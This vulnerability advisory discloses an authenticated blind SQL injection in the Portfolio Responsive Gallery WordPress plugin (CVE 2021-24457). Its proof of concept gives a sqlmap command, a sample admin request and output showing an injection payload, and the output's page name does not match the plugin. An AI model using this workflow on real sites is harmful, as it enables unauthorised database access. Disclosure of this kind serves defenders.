Portfolio Responsive Gallery < 1.1.8 – Authenticated Blind SQL Injections | CVE 2021-24457

Description

The get_portfolios() and get_portfolio_attributes() functions in the class-portfolio-responsive-gallery-list-table.php and class-portfolio-responsive-gallery-attributes-list-table.php files of the plugin did not use whitelist or validate the orderby parameter before using it in SQL statements passed to the get_results() DB calls, leading to SQL injection issues in the admin dashboard

Proof of Concept

SQLMAP: python sqlmap.py -r r.txt -p orderby  --level 5 --risk 3 --dbms MySQL --technique B --dbs 
With r.txt is GET OR POST requests to sort portfolios,portfolio_attributes.

GET /wp-admin/admin.php?page=portfolio-responsive-gallery&orderby=name&order=desc HTTP/1.1
Host: ..........
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.75.131/wp-admin/admin.php?page=portfolio-responsive-gallery&orderby=name&order=asc
Connection: close
Cookie: ......
Upgrade-Insecure-Requests: 1


SQLMAP OUTPUT:
---
Parameter: orderby (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: page=quiz-maker&orderby=(SELECT (CASE WHEN (5750=5750) THEN 0x7469746c65 ELSE (SELECT 1570 UNION SELECT 3396) END))&order=asc
---
[22:38:25] [INFO] testing MySQL
[22:38:25] [INFO] confirming MySQL
[22:38:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 8.0.0